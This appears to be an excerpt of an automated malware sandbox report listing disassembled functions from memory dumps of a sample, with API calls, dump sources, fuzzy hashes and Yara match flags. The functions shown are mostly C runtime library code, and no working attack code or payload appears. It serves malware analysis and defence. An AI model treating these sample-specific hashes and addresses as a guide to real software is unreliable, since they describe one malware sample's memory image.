                                                      • Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                                      • Instruction ID: 67f5028ce37506d92e6630780152a723539405560d866ceca457ac85021ef5c6
                                                      • Opcode Fuzzy Hash: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                                      • Instruction Fuzzy Hash: EDC16C71A002189FEB25CF28CD84BEAB7B5FF49704F5045E8E509A76A0DB75BA84CF50
                                                      Function 0040AE84 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                      • Instruction ID: 88ef4a02ba2930d6a04adc46f9a2f5105df9e51eba4518f207ac4bbffbfe15f9
                                                      • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                      • Instruction Fuzzy Hash: E151D1B1600303AFDB299F15D841BABB3A4EF44314F14413FE801A76D2E739AC65D79A
                                                      Function 04CCA284 Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                      • Instruction ID: 6ae80946331c6f36523722e23da553ceeab21126bb61fad42f7db94e4829b33d
                                                      • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                      • Instruction Fuzzy Hash: EF51E272A0121AEFEB298F54D858BBAB7A7EF44314F18412DE80587290E733F980D7D0
                                                      Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                      • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                      • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                      • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                      Function 04B1B0EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                      • Instruction ID: ec3ab4f1c22db9016200b18d1b1f7ca1e2dd53e587959d774ac98b60aa7a0b26
                                                      • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                      • Instruction Fuzzy Hash: 0351C172A09606AFEF298F10D881BBA7BA4FF04714F9441ADE805976B0E731F965C790
                                                      Function 00415A49 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16
                                                        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599
                                                      • GetLastError.KERNEL32 ref: 00415AB1
                                                      • __dosmaperr.LIBCMT ref: 00415AB8
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
                                                      • __dosmaperr.LIBCMT ref: 00415AFE
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                      • String ID:
                                                      • API String ID: 167067550-0
                                                      • Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                      • Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
                                                      • Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                      • Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4
                                                      Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                                        • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                      • GetLastError.KERNEL32 ref: 10007C36
                                                      • __dosmaperr.LIBCMT ref: 10007C3D
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                      • __dosmaperr.LIBCMT ref: 10007C83
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                      • String ID:
                                                      • API String ID: 167067550-0
                                                      • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                      • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                      • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                      • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                      Function 04B25CB0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04B1FE6F: _free.LIBCMT ref: 04B1FE7D
                                                        • Part of subcall function 04B2375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B288CA,?,?,?,00000000,?,04B28639,0000FDE9,00000000,?), ref: 04B23800
                                                      • GetLastError.KERNEL32 ref: 04B25D18
                                                      • __dosmaperr.LIBCMT ref: 04B25D1F
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 04B25D5E
                                                      • __dosmaperr.LIBCMT ref: 04B25D65
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                      • String ID:
                                                      • API String ID: 167067550-0
                                                      • Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                      • Instruction ID: 21e391993c6db3b3e32135595bc0c79c94aafa326723fd6b7023f4a0d7cbceb8
                                                      • Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                      • Instruction Fuzzy Hash: D421C871600625BFEB30AF76CE84D6BB7ACEF042A87008599E82E97150F735FD4097A0
                                                      Function 04B21DB1 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                      • Instruction ID: 1ddfcfdda4c75751d4794d741024a1e7bcfcc55184fa76fb1f28169cd7fc5e31
                                                      • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                      • Instruction Fuzzy Hash: E621C671F01231ABD771AB2C9D84B6A7764EF45BA0F150DA1ED0AA7290EA30FD01C6E4
                                                      Function 004111FD Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,771ADF80,?,004114AD,00000000,771ADF80,00000000,00000000,00401ED8), ref: 00411202
                                                      • _free.LIBCMT ref: 0041125F
                                                      • _free.LIBCMT ref: 00411295
                                                      • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,771ADF80,00000000,00000000,00401ED8), ref: 004112A0
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                      • Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
                                                      • Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                      • Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D
                                                      Function 10006E9C Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                                      • _free.LIBCMT ref: 10006EFE
                                                      • _free.LIBCMT ref: 10006F34
                                                      • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                      • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                                      • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                      • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                                      Function 04B21464 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(04B1213F,?,04B12143,04B1C610,?,04B1213F,0041D0A0,?,04B21714,00000000,0041D0A0,00000000,00000000,04B1213F), ref: 04B21469
                                                      • _free.LIBCMT ref: 04B214C6
                                                      • _free.LIBCMT ref: 04B214FC
                                                      • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B21714,00000000,0041D0A0,00000000,00000000,04B1213F), ref: 04B21507
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                      • Instruction ID: ee918bcfa7ae21db4a8092bd44398ee0778cdd04898d494b86ad81381f0ffbd5
                                                      • Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                      • Instruction Fuzzy Hash: CB110232700A352BE7212EBCAF85D7B2659CBC0278F6407F4F93C961E0EB25BC129515
                                                      Function 00411354 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
                                                      • _free.LIBCMT ref: 004113B6
                                                      • _free.LIBCMT ref: 004113EC
                                                      • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                      • Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
                                                      • Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                      • Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D
                                                      Function 10006FF3 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                                      • _free.LIBCMT ref: 10007055
                                                      • _free.LIBCMT ref: 1000708B
                                                      • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                      • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                                      • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                      • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                                      Function 04B215BB Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,04B1C5A5,04B22748,?,?,04B1A3C2,?,?,?,04B11353,?,04B1370E,?,?), ref: 04B215C0
                                                      • _free.LIBCMT ref: 04B2161D
                                                      • _free.LIBCMT ref: 04B21653
                                                      • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B1A3C2,?,?,?,04B11353,?,04B1370E,?,?,?), ref: 04B2165E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                      • Instruction ID: 203818acf9408485ec5ccf0ff59bc0841c25a5923e9ae5cd5f7526b396c92876
                                                      • Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                      • Instruction Fuzzy Hash: DE112132B002317BE7222ABCAF85D7B225ADBC0278B6403F4F52CC21E0EB71BC129115
                                                      Function 04B1C07E Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,04B1C13F,?,?,0042B000,00000000,?,04B1C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 04B1C10E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                      • Instruction ID: b3580d2b40dfd89df67cb5c360d09de6c2fc6f7f592aaff32c5207578b3d612f
                                                      • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                      • Instruction Fuzzy Hash: 3F11A731EC1221ABDB228B789C49B9D7B74EF027A0F5541A1FE11B72A0D674F95086D8
                                                      Function 04CCA1A4 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04CCA1C0
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04CCA1D9
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Value___vcrt_
                                                      • String ID:
                                                      • API String ID: 1426506684-0
                                                      • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                      • Instruction ID: a856fec3c0affccbbb16f98d5db9a1f5f92deb7b36bf0aa607ad366277790717
                                                      • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                      • Instruction Fuzzy Hash: B201D4323092299FA7242EF57C8DB662B56EB05679730033EE914951E0FE1B7D126288
                                                      Function 0041AE22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
                                                      • GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45
                                                        • Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B
                                                      • ___initconout.LIBCMT ref: 0041AE55
                                                        • Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0
                                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                      • String ID:
                                                      • API String ID: 2744216297-0
                                                      • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                      • Instruction ID: ee4a97f4c5e0560d025622a6e285d837d398bf1ce1ecb10de8e4d9e98fca97b7
                                                      • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                      • Instruction Fuzzy Hash: 26F0F836942214BBCF222F929C049CA3F26EF087A5F054025FA0985130C63689B19B9A
                                                      Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                      • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                        • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                      • ___initconout.LIBCMT ref: 1000CD55
                                                        • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                      • String ID:
                                                      • API String ID: 2744216297-0
                                                      • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                      • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                      • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                      • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                      Function 04B2B089 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,04B2AD36,00000000,00000001,00000000,00000000,?,04B2830F,00000000,00000000,00000000), ref: 04B2B0A0
                                                      • GetLastError.KERNEL32(?,04B2AD36,00000000,00000001,00000000,00000000,?,04B2830F,00000000,00000000,00000000,00000000,00000000,?,04B28863,?), ref: 04B2B0AC
                                                        • Part of subcall function 04B2B072: CloseHandle.KERNEL32(0042A930,04B2B0BC,?,04B2AD36,00000000,00000001,00000000,00000000,?,04B2830F,00000000,00000000,00000000,00000000,00000000), ref: 04B2B082
                                                      • ___initconout.LIBCMT ref: 04B2B0BC
                                                        • Part of subcall function 04B2B034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,04B2B063,04B2AD23,00000000,?,04B2830F,00000000,00000000,00000000,00000000), ref: 04B2B047
                                                      • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,04B2AD36,00000000,00000001,00000000,00000000,?,04B2830F,00000000,00000000,00000000,00000000), ref: 04B2B0D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                      • String ID:
                                                      • API String ID: 2744216297-0
                                                      • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                      • Instruction ID: 4b41c1a4f4546ca2144fe8c164aef92d767650408dbe899bdb73f4e3c3752733
                                                      • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                      • Instruction Fuzzy Hash: FFF03036901125BBCF236FA1DD089DA7F26FF086A4F054460FE1D96130CA32A961DB95
                                                      Function 004091F8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
                                                      • RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
